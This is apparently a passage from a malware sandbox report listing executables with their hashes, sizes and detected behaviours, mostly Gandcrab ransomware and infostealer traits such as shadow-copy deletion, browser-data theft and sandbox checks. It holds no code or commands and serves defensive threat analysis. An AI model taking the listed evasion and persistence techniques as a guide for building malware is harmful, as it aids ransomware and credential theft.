      f660796e27a752ba6037ee68f44b29d4

    • SHA1

      dcd5a2ac5bae36bacb4b3ce15b63b5af3c4c9d33

    • SHA256

      9001d3e08e34598061281c2187b4deeee8022081f4706e9b7b89d52244ccf426

    • SHA512

      d8219d64b9d576308b0a2a44cf1bd22ec2973fdee4b775c6dc38689a39772468acd2fec2d8b50ad8d8925f8f14ae9722dcc2ca74f1b50eb74851590acea0daaf

    • SSDEEP

      6144:wZOmcTK/WkW0PwFgRfqPKbmZq3f2GaYoccionP0+nwWjn:xmcT44FgRSSKZeSc1ocKxjn

    • Gandcrab

      Gandcrab is a Trojan horse that encrypts files on a computer.

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Renames multiple (302) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Drops startup file

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Sets desktop wallpaper using registry

    • Target

      92aa0505ed000f9c5e54313506e3ebd0f1ae37628003a1275e302f6769bdf5f0.exe

    • Size

      197KB

    • MD5

      d5af92ab973f641a23df5d0f955a4854

    • SHA1

      e99e0b35c6672b15cd2cb927d8462609fd6e9067

    • SHA256

      92aa0505ed000f9c5e54313506e3ebd0f1ae37628003a1275e302f6769bdf5f0

    • SHA512

      96fededa28ff7918aae0ef83463384b55ba2b7e146d78c7f2557a5e4218181de7abf4c3a2ff0dba6822cfc983e92af8e9fc50698a20c69daff0fa79e1094ba6a

    • SSDEEP

      3072:j4iTqLw4MdVql02+btqf1y3SCbFOg580+ZXEhkUy3j6aviwK+CRXs5F89B:8iWLPmVqll+8fWSkO90+Z593j6OiwwD

    • Gandcrab

      Gandcrab is a Trojan horse that encrypts files on a computer.

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Renames multiple (267) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Drops startup file

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Sets desktop wallpaper using registry

    • Target

      9d081b734c595a1ae38e254369c0060c5870ee119c9f7853989c23ebc204a291.exe

    • Size

      24KB

    • MD5

      8a1225f47aa9f0673c32983f1b2b2c5b

    • SHA1

      742f2364f2d5f10385b56c22ecf17a3cdcc53346

    • SHA256

      9d081b734c595a1ae38e254369c0060c5870ee119c9f7853989c23ebc204a291

    • SHA512

      d633dc2caa28a0a782108b9d47d43322c6f1d95c82903219b4b83eb491691217916e7eee35a0eb206aae2937523896e538141e524b396c2ae7210ec8f8238827

    • SSDEEP

      96:/lx5KHYFNV+Vvl/iABo1FYXGgn2PUkWf2BtvXrs2aoE8y79h9jSUyrW9EhN:/TzmVvl/vaKdnvJeBtvXrsr352UyCEh

    Score
    4/10
    • Target

      9e288f3839546e5c382c6b3ccc1516a6bf797ad188107534a18eb6e4203117c7.exe

    • Size

      42KB

    • MD5

      e7b365fbcce1ea6c057bf8d3c06c2879

    • SHA1

      4b66fc1e7b48d2c3b35c07fc5ce8173b039016a3

    • SHA256

      9e288f3839546e5c382c6b3ccc1516a6bf797ad188107534a18eb6e4203117c7

    • SHA512

      cbf80afc11763e0861da5d30571f1d5f4975cb511abc49b9ddbecb7a906d65e5066e626aef089157e22e880da32ed8968825ca7cd859cd0364c9acc33453cdd7

    • SSDEEP

      768:mXlsdclumB/3GWK1Bmf/gsAyIpv6G/3PM17GhWy:gMclnKPmfu/

    Score
    7/10
    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Drops file in System32 directory

    • Target

      9e87f069de22ceac029a4ac56e6305d2df54227e6b0f0b3ecad52a01fbade021.exe

    • Size

      338KB

    • MD5

      bbd4c2d2c72648c8f871b36261be23fd

    • SHA1

      77c525e6b8a5760823ad6036e60b3fa244db8e42

    • SHA256

      9e87f069de22ceac029a4ac56e6305d2df54227e6b0f0b3ecad52a01fbade021

    • SHA512

      38f2ff3b7ff6faa63ef0a3200e0dbb9e48e1d404a065f6919cb6d245699479896a42316f299c33c8cc068922934c64f8aa06c88b000d1676870c1d0c0f18e14a

    • SSDEEP

      6144:zUrigyvF8Q9fLglQ8t0qabFDfOdQ/LDA8H+wwaMZUUAOq+mwNf8fsS+:zUrigY8QBLg9t0qabFDGdQ/TlYiUQ+Vz

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Enumerates VirtualBox registry keys

    • Looks for VirtualBox Guest Additions in registry

    • Renames multiple (169) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Checks BIOS information in registry

      BIOS information is often read in order to detect sandboxing environments.

    • Deletes itself

    • Drops startup file

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Sets desktop wallpaper using registry

    • Target

      9f01f1a042c48b0e51f5e6029a661f5f08aad6ca0912a1b444afac6f2d4f2ad2.exe

    • Size

      137KB

    • MD5

      90c3d889324a93c1c90f05fd63597dae

    • SHA1

      1f5bc404738304231485054c6586a5036816e95e

    • SHA256

      9f01f1a042c48b0e51f5e6029a661f5f08aad6ca0912a1b444afac6f2d4f2ad2

    • SHA512

      fbaf6261b8b5596b03eddcebaa54bf4e44753878026adf969847fb25738013a6436a40da8577f2de5e5c15cc7c74a37115b454445ecaa778fec7e8588c4c3455

    • SSDEEP

      3072:gMmgyo3o4+2YK7b21Tve+Owhm0ewGbAFv:gMmgyo3o0YK7bATvxOwsbG

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Modifies boot configuration data using bcdedit

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Deletes itself

    • Executes dropped EXE

    • Loads dropped DLL

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Adds Run key to start application

    • Drops file in System32 directory

    • Sets desktop wallpaper using registry

    • Target

      a7b82203fa6a1831100fd414a5ef599edfbc72e63e34fc9847dd4e96c0bac64f.exe

    • Size

      45KB

    • MD5

      efdeebc05e7cfee5a07fa3dd7ab20e1f

    • SHA1

      b1c23a7a399e24cb27213c5efca15cfba8baff06

    • SHA256

      a7b82203fa6a1831100fd414a5ef599edfbc72e63e34fc9847dd4e96c0bac64f

    • SHA512

      261d489b6637751ca6eda5e6702d8e1d38028314cf4f7899951cafa59fa7a0e5f2021eab6bcf42b006a2515c0ce5e811a06e96aae6a2c5db10225a2450114e5d

    • SSDEEP

      768:DPphueH/BQLusoLpaXAMUPfktNLcVxdlupCuEkOWASuoeimtO4w8q8B3A:DPpB1soLpaQ/nymvH7W/feLtLB3A

    Score
    7/10
    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      b5a2fe5b87deed18b789929faaa7601771de63dfe6a670d09224aa57ebe8c6b9.exe

    • Size

      168KB

    • MD5

      d1c616cf0fd1eb61164e9091cad354c5

    • SHA1

      444539834e496f04cf9c07594645ca252f3b52a8

    • SHA256

      b5a2fe5b87deed18b789929faaa7601771de63dfe6a670d09224aa57ebe8c6b9

    • SHA512

      441477d5a429dad3e499e943c8dfb54ad673320eed81f4fec00b3798839b3bb296c446354d5e1f46ec52aa278417011ab8ae7f374df1347e341e46243276af00

    • SSDEEP

      3072:B36NS6YsVsI11Tl2JD5wMPm+RY8RvPCdSGk8RQcj2Er:B3H6TsuzYGMgWcSE

    • Gandcrab

      Gandcrab is a Trojan horse that encrypts files on a computer.

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Renames multiple (275) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Drops startup file

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Sets desktop wallpaper using registry

    • Target

      cf0fe3723a41d7105f5b6d8a1be3ef6d43135c96714ffcb2c19d8a9ad9021c36.exe

    • Size

      169KB

    • MD5

      fb6fc3f65a53371756e4806bb5b1ce88

    • SHA1

      4a3f16f710b8732ac769f66bca4292220d1c045a

    • SHA256

      cf0fe3723a41d7105f5b6d8a1be3ef6d43135c96714ffcb2c19d8a9ad9021c36

    • SHA512

      b7541b5ae16e91565d4f8041e2f416f3c3f065c5f7b0b187aa81c5f7a1af5bef75342f382a7a0cba12732f301e872d5758c0ae7b61657a8bcab141b3f1db4adc

    • SSDEEP

      3072:/fCjdqA19PzcD28y+IDN8FPguf/I2KbnehQpSEymq9Gs6c/R7b3doBHpT0FFH8Yc:iCIh8dlf/I2K7OQp/ymns6U7b3CsOOFO

    • Gandcrab

      Gandcrab is a Trojan horse that encrypts files on a computer.

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Renames multiple (294) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Drops startup file

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Sets desktop wallpaper using registry

    • Target

      cf31156df08d27e16fb25b16c42176b04fa7d968e18c58e9017c7d85ffce4435.exe

    • Size

      89KB

    • MD5

      e3b25f81f0a21cfcda2848897c3734fd

    • SHA1

      1e068334dd9a1b73dc4491cabbcfe2ce31579ee0

    • SHA256

      cf31156df08d27e16fb25b16c42176b04fa7d968e18c58e9017c7d85ffce4435

    • SHA512

      395ad7858574dbfa819d451194245099c6e6a129e9369ae1ff16b323e5918cf4f81467edef674494e0b128a650c6693e44bd9de2fb319bf8c7bf024b10e6bd39

    • SSDEEP

      1536:x4B3t0KkhodqWUpJ6pPMxTl4YKRPu7/dgEOTvezuKtlx7D34nIsgf+YziT9pwqlq:xM5k6qWFvYKRPIgEOTveDnx7Don76+Yr

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Modifies boot configuration data using bcdedit

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Deletes itself

    • Executes dropped EXE

    • Loads dropped DLL

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Adds Run key to start application

    • Drops file in System32 directory

    • Sets desktop wallpaper using registry

    • Target

      f95b6a45f1ae3b4ddf74fcc2f193a0a25df6f272b722e5c29edc838a99180061.exe

    • Size

      220KB

    • MD5

      75795c8ef2b35b12e73305c32b010e84

    • SHA1

      17bf9c32f3920ea9ed3614c0a067cf07d4419ba8

    • SHA256

      f95b6a45f1ae3b4ddf74fcc2f193a0a25df6f272b722e5c29edc838a99180061

    • SHA512

      aafd5f6d72405c71093d9e0649f7923a4325af6faf381af0da1f66c49e194b98cc7cb80cfb29dcba8b5bda5e80f5124a0f908d90a406d79025e0fa2f2ad5570b

    • SSDEEP

      6144:eVDC9bGASz7+OeO+OeN7VBBhhBBNu1IFksAOTRGC2Bu:e0KAS+OeO+OeNhBBhhBBN0IFksL

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Renames multiple (9821) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Deletes itself

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Drops desktop.ini file(s)

    • Target

      fd49914f47d9ed24fe475c263a32b34d9ed9e472379ede30530a4a3c64510d24.exe

    • Size

      188KB

    • MD5

      6f6be02547e9365d2ca5173dc8e5201a

    • SHA1

      ffb1b17d0b3d3fe71b250cad13b2371f5e4f0452

    • SHA256

      fd49914f47d9ed24fe475c263a32b34d9ed9e472379ede30530a4a3c64510d24

    • SHA512

      65b5224240e62ef405f86ce678e94f62953af0fc89cebf6d2457f675adb2f58d007953b9a654f01c66f1c87bcc4d66bbb8585aa66acfbce51334cf6202d4254d

    • SSDEEP

      3072:7dIDN8FPguf/I2KbnehQpSEymq9Gs6c/R7b3doBHZT0FFH8MubkJ8wo1:xIh8dlf/I2K7OQp/ymns6U7b3C8ObGo1

    • Gandcrab

      Gandcrab is a Trojan horse that encrypts files on a computer.

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Renames multiple (302) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Drops startup file

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Sets desktop wallpaper using registry

MITRE ATT&CK Enterprise v15

Tasks

static1

upx
Score
7/10

behavioral1

spywarestealer
Score
7/10

behavioral2

spywarestealerupx
Score
7/10

behavioral3

gandcrabbackdoordefense_evasionexecutionimpactransomwarespywarestealer
Score
10/10

behavioral4

spywarestealerupx
Score
7/10

behavioral5

Score
3/10

behavioral6

spywarestealerupx
Score
7/10

behavioral7

persistenceransomware
Score
9/10

behavioral8

ransomwarespywarestealer
Score
9/10

behavioral9

Score
1/10

behavioral10

gandcrabbackdoordefense_evasionexecutionimpactransomwarespywarestealer
Score
10/10

behavioral11

persistenceransomware
Score
9/10

behavioral12

gandcrabbackdoordefense_evasionexecutionimpactransomwarespywarestealer
Score
10/10

behavioral13

spywarestealer
Score
7/10

behavioral14

defense_evasionexecutionimpactpersistenceransomwarespywarestealer
Score
9/10

behavioral15

gandcrabbackdoordefense_evasionexecutionimpactransomwarespywarestealer
Score
10/10

behavioral16

defense_evasionevasionexecutionimpactpersistenceransomwarespywarestealer
Score
10/10

behavioral17

defense_evasionevasionexecutionimpactpersistenceransomwaretrojan
Score
10/10

behavioral18

spywarestealer
Score
7/10

behavioral19

gandcrabbackdoordefense_evasionexecutionimpactransomwarespywarestealer
Score
10/10

behavioral20

gandcrabbackdoordefense_evasionexecutionimpactransomwarespywarestealer
Score
10/10

behavioral21

Score
4/10

behavioral22

spywarestealer
Score
7/10

behavioral23

defense_evasionevasionexecutionimpactransomwarespywarestealer
Score
10/10

behavioral24

defense_evasionevasionexecutionimpactpersistenceransomwarespywarestealer
Score
10/10

behavioral25

spywarestealerupx
Score
7/10

behavioral26

gandcrabbackdoordefense_evasionexecutionimpactransomwarespywarestealer
Score
10/10

behavioral27

gandcrabbackdoordefense_evasionexecutionimpactransomwarespywarestealer
Score
10/10

behavioral28

defense_evasionevasionexecutionimpactpersistenceransomwarespywarestealer
Score
10/10

behavioral29

defense_evasionexecutionimpactransomwarespywarestealer
Score
9/10

behavioral30

gandcrabbackdoordefense_evasionexecutionimpactransomwarespywarestealer
Score
10/10